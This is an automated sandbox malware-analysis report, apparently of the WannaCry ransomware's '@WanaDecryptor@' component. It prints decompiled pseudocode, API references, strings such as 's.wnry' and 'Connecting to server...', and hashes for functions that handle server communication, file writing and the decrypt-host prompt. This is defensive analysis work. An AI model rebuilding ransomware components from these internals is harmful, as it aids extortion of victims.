Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57

Uniqueness

Uniqueness Score: -1.00%

Function 0040C240 Relevance: 13.7, APIs: 9, Instructions: 195
windowfileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
				char _v0;
				char _v4;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v34;
				long _v36;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v65;
				char _v68;
				int _v76;
				char _v77;
				void* _t57;
				signed int _t76;
				struct HWND__* _t92;
				long _t133;
				struct _IO_FILE* _t136;
				struct HWND__* _t138;
				signed int _t140;
				int _t141;
				intOrPtr _t143;
				void* _t144;

				_push(0xffffffff);
				_push(E004142DB);
				 *[fs:0x0] = _t143;
				E00413060(0x240c, __ecx,  *[fs:0x0]);
				_push(_t140);
				E0040DBB0( &_v0, 0x1000);
				_a9220 = 0;
				_push( &_v4);
				_t141 = _t140 | 0xffffffff;
				_t57 = E0040BED0(_a9228, _a9232, 0xc);
				_t144 = _t143 + 0x10;
				if(_t57 == 0) {
					_t138 = _a9272;
					if(_t138 != 0) {
						SendMessageA(_t138, 0x4e20, 0, 0);
					}
					_push(8);
					_push(_a9240);
					E0040DC00( &_v0);
					_v12 = _a9236;
					_push(4);
					_push( &_v12);
					E0040DC00( &_v8);
					E0040DD00( &_v16, _a9240);
					E0040DD00( &_v20, _a9240);
					_push(1);
					_push( &_v34);
					_v34 = _a9240;
					E0040DC00( &_v24);
					_t133 = _a9220;
					_push(4);
					_push( &_v36);
					_v36 = _t133;
					E0040DC00( &_v32);
					_push(_t133);
					_push(_a9208);
					E0040DC00( &_v40);
					_push(0);
					_push(E0040DD40( &_v48));
					_push(E0040DD30( &_v48));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0, 0);
						}
						_push( &_v64);
						_push( &_a4060);
						_v64 = 0x13ec;
						_push( &_v65);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if(_v77 == 7) {
								_t141 = 0;
								if(_v76 > 0) {
									_t136 = fopen(_a9200, "wb");
									_t144 = _t144 + 8;
									if(_t136 != 0) {
										fwrite( &_a4048, 1, _v76, _t136);
										fclose(_t136);
										_t144 = _t144 + 0x14;
										_t141 = 1;
									}
								}
							}
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, _t141, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							L23:
							E0040DBF0( &_v68);
							_t76 = _t141;
						} else {
							if(_t138 != 0) {
								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							_a9156 = 0xffffffff;
							_t76 = E0040DBF0( &_v68) | 0xffffffff;
						}
						goto L24;
					} else {
						if(_t138 != 0) {
							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						_a9168 = 0xffffffff;
						_t76 = E0040DBF0( &_v56) | 0xffffffff;
						L24:
						 *[fs:0x0] = _a9148;
						return _t76;
					}
				}
				_t92 = _a9272;
				if(_t92 != 0) {
					SendMessageA(_t92, 0x4e20, _t141, 0);
				}
				_a9224 = _t141;
				goto L23;
			}

0x0040c240
0x0040c248
0x0040c253
0x0040c25a
0x0040c260
0x0040c26c
0x0040c283
0x0040c28e
0x0040c293
0x0040c296
0x0040c29b
0x0040c2a0
0x0040c2c8
0x0040c2d7
0x0040c2e3
0x0040c2e3
0x0040c2ec
0x0040c2ee
0x0040c2f3
0x0040c303
0x0040c307
0x0040c309
0x0040c30e
0x0040c31f
0x0040c330
0x0040c340
0x0040c342
0x0040c347
0x0040c34b
0x0040c350
0x0040c35b
0x0040c35d
0x0040c362
0x0040c366
0x0040c372
0x0040c373
0x0040c378
0x0040c382
0x0040c38f
0x0040c39f
0x0040c3a0
0x0040c3a7
0x0040c3e2
0x0040c3ee
0x0040c3ee
0x0040c3fa
0x0040c402
0x0040c403
0x0040c411
0x0040c417
0x0040c452
0x0040c458
0x0040c45c
0x0040c470
0x0040c472
0x0040c477
0x0040c489
0x0040c48f
0x0040c494
0x0040c497
0x0040c497
0x0040c477
0x0040c45c
0x0040c49e
0x0040c4a9
0x0040c4a9
0x0040c4b3
0x0040c4b6
0x0040c4c1
0x0040c4c5
0x0040c4ca
0x0040c419
0x0040c41b
0x0040c427
0x0040c427
0x0040c431
0x0040c438
0x0040c448
0x0040c448
0x00000000
0x0040c3a9
0x0040c3ab
0x0040c3b7
0x0040c3b7
0x0040c3c1
0x0040c3c8
0x0040c3d8
0x0040c4cc
0x0040c4d7
0x0040c4e4
0x0040c4e4
0x0040c3a7
0x0040c2a2
0x0040c2ab
0x0040c2b6
0x0040c2b6
0x0040c2bc
0x00000000

APIs

Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C

SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
fopen.MSVCRT ref: 0040C46B
fwrite.MSVCRT ref: 0040C489
fclose.MSVCRT ref: 0040C48F
SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#823fclosefopenfwrite
String ID:
API String ID: 1132507536-0
Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49
windowtimethreadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00401140() {
				intOrPtr _v4;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0);
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					 *((intOrPtr*)(_t23 + 0xac)) = CreateThread(0, 0, E004012D0, _t23, 0, 0);
				}
				return 1;
			}

0x00401143
0x00401145
0x00401160
0x00401162
0x00401175
0x00401177
0x00401178
0x00401184
0x0040118d
0x00401194
0x004011a9
0x004011b3
0x004011c1
0x004011d7
0x004011d7
0x004011e5

APIs

#4710.MFC42 ref: 00401145
SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
#537.MFC42(Connecting to server...), ref: 0040118D

Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF

SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1

Strings

Connecting to server..., xrefs: 00401188

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
String ID: Connecting to server...
API String ID: 3305248171-1849848738
Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402F10 Relevance: 10.6, APIs: 7, Instructions: 139COMMON

Download Yara Rule

APIs

?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
String ID:
API String ID: 2613176527-0
Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}

APIs

fopen.MSVCRT ref: 00407FBD
fread.MSVCRT ref: 00407FDD
fclose.MSVCRT ref: 00407FE4

Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE

Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628

Strings

+++, xrefs: 00408011, 00408035
00000000.res, xrefs: 00407FB6
s.wnry, xrefs: 00407FF8

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: strncpy$fclosefopenfread
String ID: +++$00000000.res$s.wnry
API String ID: 3363958884-869915597
Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696

Uniqueness

Uniqueness Score: -1.00%

Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}

APIs

SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
KillTimer.USER32(?,000003E9), ref: 0040125E
#4853.MFC42 ref: 00401266
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
#2379.MFC42 ref: 004012C4

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#2379#4853KillTimer
String ID:
API String ID: 178170520-0
Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58

Uniqueness

Uniqueness Score: -1.00%

Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}

0x00403861
0x0040387a
0x0040387f
0x00403881
0x0040389f
0x004038a3
0x004038b5
0x004038c5
0x004038cb
0x00000000
0x004038cb
0x004038d3
0x00403883
0x00403883
0x00403885
0x0040388a
0x00403891
0x00403891

APIs

SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
#1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5

Strings

Please select a host to decrypt., xrefs: 00403885

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: MessageSend$#1200CreateThread
String ID: Please select a host to decrypt.
API String ID: 3616405048-3459725315
Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668

Uniqueness

Uniqueness Score: -1.00%

Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}

APIs

GetParent.USER32(?), ref: 004044D2
#2864.MFC42(00000000), ref: 004044D9
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
#2860.MFC42(00000000), ref: 004044EF
GetObjectA.GDI32(?,0000003C,?), ref: 00404503
CreateFontIndirectA.GDI32(?), ref: 00404513
#1641.MFC42(00000000), ref: 0040451D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
String ID:
API String ID: 2724197214-0
Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						 *((intOrPtr*)( *((intOrPtr*)( *0x422210)) + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}

0x0040c066
0x0040c068
0x0040c073
0x0040c07a
0x0040c07f
0x0040c08b
0x0040c0a2
0x0040c0ad
0x0040c0b2
0x0040c0b5
0x0040c0ba
0x0040c0bf
0x0040c0e7
0x0040c0f6
0x0040c102
0x0040c102
0x0040c111
0x0040c11c
0x0040c129
0x0040c139
0x0040c13a
0x0040c142
0x0040c17d
0x0040c189
0x0040c189
0x0040c195
0x0040c19d
0x0040c19e
0x0040c1ac
0x0040c1b2
0x0040c1ed
0x0040c1ef
0x0040c1ef
0x0040c1f3
0x0040c1fe
0x0040c1fe
0x0040c208
0x0040c20b
0x00000000
0x0040c1b4
0x0040c1b6
0x0040c1c2
0x0040c1c2
0x0040c1cc
0x0040c1d3
0x0040c1e3
0x0040c1e3
0x0040c144
0x0040c146
0x0040c152
0x0040c152
0x0040c15c
0x0040c163
0x0040c173
0x0040c173
0x0040c0c1
0x0040c0c1
0x0040c0ca
0x0040c0d5
0x0040c0d5
0x0040c0db
0x0040c216
0x0040c21a
0x0040c21f
0x0040c21f
0x0040c22b
0x0040c238

APIs

Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C

